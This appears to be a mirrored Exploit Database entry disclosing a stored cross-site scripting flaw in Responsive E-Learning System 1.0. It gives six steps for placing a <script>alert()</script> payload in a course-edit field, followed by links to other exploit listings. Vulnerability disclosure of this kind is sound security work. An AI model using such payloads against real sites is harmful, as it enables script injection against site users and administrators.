Responsive E-Learning System 1.0 – Stored Cross Site Scripting

Exploit Database
36 阅读

作者： Kshitiz Raj

日期： 2021-01-06
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49376/

# Exploit Title: Responsive E-Learning System 1.0 – Stored Cross Site Scripting
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1- Go to url http://localhost/elearning/admin/index.php
Step 2 – Login as admin.
Step 3 – Go to http://localhost/elearning/admin/course.php
Step 4 – click on Edit course (any course)
Step 5 – Enter *Course Year And Section:*as <script>alert()</script> and fill the other values.
Step 6 – Click Save

XSS popup will be triggered.

last Exploits
Responsive E-Learning System 1.0 – Stored Cross Site Scripting的更多信息

Pay Banner Text Link Ad 1.0.6.1 – Cross-Site Request Forgery (Update Admin)：
AneCMS 1.0 – Multiple Local File Inclusions：
WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 – Unauthenticated RCE via GET request：
Adult WebMaster Script – Password Disclosure：
Twig < 2.4.4 - Server Side Template Injection：
WordPress Plugin Apptha Slider Gallery 1.0 – Arbitrary File Download：
MASA2EL Music City 1.0 – SQL Injection：
Calendarix 0.8.20071118 – SQL Injection：